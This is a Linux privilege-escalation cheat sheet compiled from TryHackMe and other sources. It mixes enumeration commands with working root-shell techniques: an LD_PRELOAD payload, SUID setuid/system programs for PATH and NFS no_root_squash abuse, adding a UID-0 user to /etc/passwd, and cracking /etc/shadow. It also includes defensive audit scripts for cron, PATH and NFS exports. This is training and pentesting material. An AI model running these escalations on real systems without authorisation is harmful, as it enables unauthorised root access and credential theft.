Linux
These are notes that I have compiled from various sources to be a cheat sheet for privilege escalation on Linux machines. Some of these notes are from THM's Linux Privilege Escalation module. Others are from sources I find online.
Enumeration
Command | Description |
---|---|
hostname | hostname of the machine |
uname -a | kernel and system information |
cat /proc/version | kernel version, plus the compiler (e.g. GCC) it was built with |
cat /etc/issue | some information about the OS |
ps axjf | shows running processes as a tree |
ps aux | shows processes for (a) all users, with (u) the user that launched each process, including (x) processes not attached to a terminal |
env | shows environment variables |
sudo -l | see which commands your current user can run with sudo |
ls -la | list all files in the current directory, including hidden ones |
id (user) | general overview of the user's UID, GID and groups |
cat /etc/passwd | discover users on the system |
history | see the commands run earlier |
ifconfig | network interface information |
ip route | network route information |
netstat -a | shows all listening ports and established connections |
netstat -l | list ports in listening mode, ready to accept incoming connections |
netstat -ano | -a: display all sockets; -n: do not resolve names; -o: display timers |
find . -name flag1.txt | find the file named "flag1.txt" in the current directory |
find /home -name flag1.txt | find the file named "flag1.txt" under /home |
find / -type d -name config | find the directory named config under "/" |
find / -type f -perm 0777 | find files with 777 permissions (readable, writable and executable by all users) |
find / -perm -a=x | find files executable by all users |
find /home -user frank | find all files owned by user "frank" under /home |
find / -mtime -10 | find files modified in the last 10 days (without the minus sign, exactly 10 days ago) |
find / -atime -10 | find files accessed in the last 10 days |
find / -cmin -60 | find files changed within the last hour (60 minutes) |
find / -amin -60 | find files accessed within the last hour (60 minutes) |
find / -size +50M (or -50M, or 50M) | find files larger than, smaller than, or exactly 50 MB |
find / -writable -type d 2>/dev/null OR find / -perm -222 -type d 2>/dev/null OR find / -perm -o=w -type d 2>/dev/null | find world-writable directories (the first form lists directories writable by the current user) |
find / -perm -o=x -type d 2>/dev/null | find world-executable directories |
find / -name "perl*" (or "python*", "gcc*", etc.) | find development tools and supported languages |
find / -perm -u=s -type f 2>/dev/null | find files with the SUID bit set, which run with the privileges of the file owner rather than of the user who runs them |
nbtstat -A (IP) | Windows command for enumerating NetBIOS names: <00> UNIQUE = workstation name (held by one computer), <20> = file sharing service is up and running |
enum4linux -U -o (IP) | enumerate users (-U) and OS information (-o) from Windows and Samba systems |
Automated Enumeration Tools
- LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
- LinEnum: https://github.com/rebootuser/LinEnum
- LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
- Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
- Linux Priv Checker: https://github.com/linted/linuxprivchecker
Helpful Commands
Command | Description |
---|---|
/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")' OR /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")' | upgrade a basic shell to an interactive TTY, going from a bare $ to user@hostname:location$ |
ip route add 192.168.222.0/24 via 10.175.34.1 | add a route to the 192.168.222.0/24 network via the gateway 10.175.34.1 |
fping -a -g 192.168.82.0 192.168.82.255 2>/dev/null | ping sweep of 192.168.82.0-255, printing only the hosts that respond (-a) |
smbclient -L //(IP) -N | list SMB shares on a host without supplying a password (-N) |
(On Meterpreter) | |
hashcat -m <mode> <hash file> <wordlist> | password cracking, with the hash type selected by -m |
Privilege Escalation: Sudo
- Run sudo -l to see which commands you can run with sudo.
- Search for those commands on https://gtfobins.github.io/
Leverage application functions
Applications run through sudo can leak the contents of a file. If an application asks for an input file, point it at /etc/shadow or another protected file and check what the error output reveals.
Leverage LD_PRELOAD
LD_PRELOAD is a function that allows any program to use shared libraries. If the "env_keep" option is enabled we can generate a shared library which will be loaded and executed before the program is run. Please note the LD_PRELOAD option will be ignored if the real user ID is different from the effective user ID. - THM
The steps of this privilege escalation vector can be summarized as follows:
- Check for LD_PRELOAD (with the env_keep option)
- Write a simple C code compiled as a shared object (.so extension) file
- Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file
```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* setgid, setuid */

/* Runs when the library is loaded (-nostartfiles makes _init the entry point) */
void _init() {
    unsetenv("LD_PRELOAD");   /* keep the spawned shell from loading this library again */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
```
You can compile the code with the following command:
```
gcc -fPIC -shared -o shell.so <code_file>.c -nostartfiles
```
You can then run the program:
```
sudo LD_PRELOAD=/home/user/ldpreload/shell.so find
```
Privilege Escalation: SUID
```
find / -type f -perm -04000 -ls 2>/dev/null
```
lists files that have the SUID bit set (-02000 lists the SGID bit). Compare the result with the SUID binaries on https://gtfobins.github.io/#+suid
Reading the /etc/shadow file
If you can read the /etc/shadow file, you can use the following command to make a file that is crackable by John the Ripper:
```
unshadow passwd.txt shadow.txt > passwords.txt
```
OR
```
unshadow /etc/passwd /etc/shadow > passwords.txt
```
Adding a user to the /etc/passwd file
You can add a user with root privileges to the passwd file. You need a password hash for the user in order to do this:
```
openssl passwd -1 -salt <salt_name> <password>
```
You can use this output to add yourself to the passwd file (UID and GID 0 make the account root):
```
<username>:<output-from-command-above>:0:0:root:/root:/bin/bash
```
Privilege Escalation: Capabilities
Capabilities help manage privileges at a more granular level. For example, a SOC analyst may need a tool that initiates socket connections, which a regular user cannot do. If the system administrator does not want to give this user higher privileges, they can change the capabilities of the binary. As a result, the binary can complete its task without a higher-privileged user.
```
getcap -r / 2>/dev/null
```
-> list enabled capabilities. Go to https://gtfobins.github.io/#+capabilities to see if any of those capabilities are there.
Privilege Escalation: Cron Jobs
Cron jobs are used to run scripts or binaries at specific times. By default, they run with the privilege of their owners and not the current user.
The system-wide cron jobs are listed in /etc/crontab:
```
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
```
You can then edit or create those files and wait for the cron job to run, to get a reverse shell or read a file.
Sometimes you have to make the file executable for the cron task to run it.
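To check for that condition on a system you administer, here is an added audit helper (my own, not from the notes or THM) that reads a file in /etc/crontab format and prints every root job that references a file or directory writable by group or others. The name audit_crontab and the sample crontab built in the test are my assumptions.

```sh
#!/bin/sh
# Added audit helper, not from the original notes: reads a file in
# /etc/crontab format (min hour dom mon dow user command, or @reboot user
# command) and prints every root job that references a file or directory
# writable by group or others. Those are the entries an unprivileged user
# could edit and then wait for cron to run as root.
# Usage: audit_crontab /etc/crontab   -> exit status 1 if anything was flagged
audit_crontab() {
    crontab_file="$1"
    findings=0
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            ''|\#*|[A-Za-z_]*=*) continue ;;    # blank, comment, or VAR=value line
        esac
        set -f; set -- $line; set +f            # split into fields without globbing
        case "$1" in
            @*) [ $# -ge 3 ] || continue; user="$2"; shift 2 ;;
            *)  [ $# -ge 7 ] || continue; user="$6"; shift 6 ;;
        esac
        [ "$user" = root ] || continue
        for tok in "$@"; do
            case "$tok" in /*) ;; *) continue ;; esac     # only absolute paths
            [ -e "$tok" ] || continue
            # ls -ld mode string: char 6 is group write, char 9 is other write.
            # Read from the mode bits rather than with -w, so it also works as root.
            mode=$(ls -ld "$tok" | cut -c1-10)
            case "$mode" in
                ?????w????|????????w?)
                    echo "root job uses writable path $tok ($mode): $*"
                    findings=$((findings + 1)) ;;
            esac
        done
    done < "$crontab_file"
    [ "$findings" -eq 0 ]
}
```

Sticky world-writable directories such as /tmp are reported too when a root job works inside them, which is worth a look in its own right.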
Privilege Escalation: PATH
If a folder for which your user has write permission is located in the path, you could potentially hijack an application to run a script. PATH in Linux is an environment variable that tells the operating system where to search for executables. For any command that is not built into the shell or that is not given with an absolute path, Linux will start searching in the folders defined under PATH. (PATH is the environment variable we are talking about here; a path is the location of a file.)
This depends entirely on the existing configuration of the target system, so be sure you can answer the questions below before trying this.
- What folders are located under $PATH? (echo $PATH)
- Does your current user have write privileges for any of these folders?
- Can you modify $PATH?
- Is there a script/application you can start that will be affected by this vulnerability?
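To answer the first two questions mechanically, here is an added audit helper (not from the original notes or THM) that walks a PATH value the way the shell does and flags the entries a dropped file could hijack: writable directories, relative or empty entries, and missing directories. The name audit_path is my choice.

```sh
#!/bin/sh
# Added audit helper (not from the original notes): walks a PATH value the
# way the shell does and reports the entries a dropped file could hijack.
# Usage: audit_path            -> audits the caller's $PATH
#        audit_path "a:b:c"    -> audits the given value
# Prints one finding per line; returns 1 if anything was flagged.
audit_path() {
    path_value="${1-$PATH}"
    findings=0
    old_ifs="$IFS"
    IFS=':'
    set -f                      # no globbing while splitting on ':'
    set -- $path_value
    set +f
    IFS="$old_ifs"
    for entry in "$@"; do
        case "$entry" in
            "")
                echo "EMPTY entry: an empty element means the current directory"
                findings=$((findings + 1)); continue ;;
            /*) ;;
            *)
                echo "RELATIVE entry: $entry (resolved from the current directory)"
                findings=$((findings + 1)); continue ;;
        esac
        if [ ! -d "$entry" ]; then
            echo "MISSING: $entry (whoever can write its parent can create it)"
            findings=$((findings + 1))
        elif [ -w "$entry" ]; then
            echo "WRITABLE by $(id -un): $entry"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
}
```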
Script for launching a binary
```c
#include <stdlib.h>   /* system */
#include <unistd.h>   /* setuid, setgid */

int main(void)
{
    setuid(0);
    setgid(0);
    system("binary_name");   /* looked up through PATH, so a writable PATH entry decides what runs */
    return 0;
}
```
Run the commands to compile the executable:
```
gcc script.c -o script -w
chmod u+s script
```
This will give the executable the SUID bit.
```
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
```
-> find writable folders
```
export PATH=/tmp:$PATH
```
-> prepend /tmp to the PATH. You can add more as needed.
The vulnerability is that a binary resolved through PATH can be modified or replaced with your own code.
Privilege Escalation: NFS
NFS (Network File System) configuration is kept in the /etc/exports file. This file is created during the NFS server installation and can usually be read by users. The critical element for this privilege escalation vector is the "no_root_squash" option. By default, NFS maps the root user to nfsnobody and prevents any file on the share from operating with root privileges. If the "no_root_squash" option is present on a writable share, we can create an executable with the SUID bit set and run it on the target system.
```
cat /etc/exports
```
-> for local mountable shares
```
showmount -e (IP)
```
-> for remote mountable shares
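To review an exports file for that option, here is an added helper (not part of the original notes) that reads an /etc/exports style file and reports every client entry exported with no_root_squash, marking the rw ones described above as HIGH. The name audit_exports and the assumed syntax (/path host(opts) host2(opts) ...) are mine.

```sh
#!/bin/sh
# Added audit helper, not part of the original notes: reads an /etc/exports
# style file (/path host(opt,opt) host2(opt) ...) and reports every client
# entry exported with no_root_squash. rw + no_root_squash is marked HIGH
# (a client root can place root-owned SUID files on the share); read-only
# exports with the option are MEDIUM. Clients with no option list keep the
# root_squash default and are not reported.
# Usage: audit_exports /etc/exports   -> exit status 1 if anything was flagged
audit_exports() {
    exports_file="$1"
    findings=0
    while IFS= read -r line || [ -n "$line" ]; do
        line="${line%%#*}"                    # drop comments
        set -f; set -- $line; set +f          # split fields, no globbing on '*'
        [ $# -ge 2 ] || continue              # need a path and at least one client
        share="$1"; shift
        for client in "$@"; do
            case "$client" in
                *\(*\)) host="${client%%\(*}"
                        opts="${client#*\(}"; opts="${opts%\)}" ;;
                *)      continue ;;
            esac
            case ",$opts," in
                *,no_root_squash,*) ;;
                *) continue ;;
            esac
            case ",$opts," in
                *,rw,*) level=HIGH ;;
                *)      level=MEDIUM ;;
            esac
            # An option list with no host in front applies to every client.
            echo "$level $share exported to ${host:-everyone} with no_root_squash ($opts)"
            findings=$((findings + 1))
        done
    done < "$exports_file"
    [ "$findings" -eq 0 ]
}
```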
NFS Steps to root:
- Run cat /etc/exports to see what the mountable shares are.
- Access those shares as the user to see if your user has access to them.
- If so, in another terminal run the following from your own system (Kali/Parrot/etc.):
```
mkdir /tmp/<any-name-here>   # I use /tmp for easy cleanup
sudo su root
mount -o rw (IP):/<remote-folder> /tmp/<any-name-here>
cd /tmp/<any-name-here>
```
- Add the following code to a file (ex. script.c):
```c
#include <stdlib.h>   /* system */
#include <unistd.h>   /* setgid, setuid */

int main()
{
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}
```
- Compile it and set the SUID bit:
```
gcc script.c -o script -w
chmod +s script
```
- Switch to the remote user and execute the script.
- Remove the NFS connection (post exploitation):
```
umount -f -l /tmp/<any-name-here>
```